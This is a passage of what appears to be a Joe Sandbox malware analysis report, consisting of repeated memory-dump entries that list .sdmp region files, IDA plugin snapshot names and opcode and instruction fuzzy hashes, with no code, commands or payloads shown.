                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction ID: db55c5b3d4b4846bc39f36dcfac6e3fc83aeb143d963a2467d445b946240b269
                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction Fuzzy Hash: 4CB15771A097158FD706EE3DC481229F7E1AFE6280F50C72EE995B7362EB71E8818744
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction ID: ed1e4c93bfec33eb4818b1f4cb135b18ba223705b84864cf8c3cfe548b9ec4cb
                              • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction Fuzzy Hash: D491E671A006158FDF15CEA8DC84BBABBA0BF55300F194568ED18AB386D332DD05CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction ID: 27e33bee5de18799167dc5daec80d32ae433a8129cf5cb5e646b97f96ab04874
                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction Fuzzy Hash: 00B13C316106099FDB15CF28C48ABA67FE1FF45368F25865CE899CF2A2C335D991CB40
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction ID: 2f1df997b4f4e98c44e1b660c734744d5a9127419b1a0850bda6ea9f357b52ac
                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction Fuzzy Hash: 80C14A75A04B1A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction ID: 15f03982a21b2455b50c3555633e7358fb0e5aa19d6a2faa39d52b5454cd5332
                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction Fuzzy Hash: 1D9157319287A16AEB168B38D8417BABB64FFE7350F10C71AF988724A1FB7185818354
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction ID: f021be44a885cef4e3ea348cd48c16f1e810f781a826823d2ed44c0c0d1ca8cb
                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction Fuzzy Hash: 86A130B2A00A19CBEB19CF55DCC5A9EBBB1FB54314F14C62AD41AE73A0D374A944CF60
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction ID: 2ea396717579671a7ad1e867b18d2061ff01de235b63543a2d76933d7c414c78
                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction Fuzzy Hash: 64A16F72A083519BD308CF25C89075FF7E2EFC8710F1ACA3DA89997254D774E9419B82
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 43c91ae2cb59c2727e22459afa8e59ab23d9e90f9e409d4d06503a431309c4d7
                              • Instruction ID: c8e9fe0f38b1138f0aace17159bd3180c61dcbf5b68b9c2155af31df443f3c8a
                              • Opcode Fuzzy Hash: 43c91ae2cb59c2727e22459afa8e59ab23d9e90f9e409d4d06503a431309c4d7
                              • Instruction Fuzzy Hash: BF5191F3A1C2009FE704AE28EC9577ABBE4EF59310F160A3DE6C9D3750E67598048796
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38bcdef0cb029f6c930de9edee705cca00591ebb82a38552d44e504d4df202a9
                              • Instruction ID: 745f08ac7bb4b8a65534ec7331c14e322602a7ffb60908fd61d066122b5b0bac
                              • Opcode Fuzzy Hash: 38bcdef0cb029f6c930de9edee705cca00591ebb82a38552d44e504d4df202a9
                              • Instruction Fuzzy Hash: C351C8F3E086049BE3106E3DDC8575ABBE2EB94310F16493CDBD897384EA3958558787
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d63777e0680ef85157fac295fbbfb73cbf9fade8b886c57396e8c0f011f66177
                              • Instruction ID: f9bf1db3038f3b16f98a803636e2259b2402157f91f2faf01699bd7d57b01b68
                              • Opcode Fuzzy Hash: d63777e0680ef85157fac295fbbfb73cbf9fade8b886c57396e8c0f011f66177
                              • Instruction Fuzzy Hash: 6D41E4F36086009BE314AE2DEC907BBB7E5EB98320F07453DE6C5C7780DA3958058796
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction ID: 4747572db6ee80094fa12bb6491e7e2b897a8a8b5c2f5a2b4aaafccbc7f04f39
                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction Fuzzy Hash: 61512B62E09BD589C7058B7544502EEFFB26FE6210F1E829EC4981F383C3759689D3E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1960d18d620e2179c633de1b9f170826e6bdf2a2217d71cc7ecf6266c463048b
                              • Instruction ID: 7935c692901f427017a985313f090ab13025c5f1359e7463e711ae08ae45707d
                              • Opcode Fuzzy Hash: 1960d18d620e2179c633de1b9f170826e6bdf2a2217d71cc7ecf6266c463048b
                              • Instruction Fuzzy Hash: 394125B3A182101BF3585938DD6677776D6DBD4320F3E863DAB95C77C4E83C98024685
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
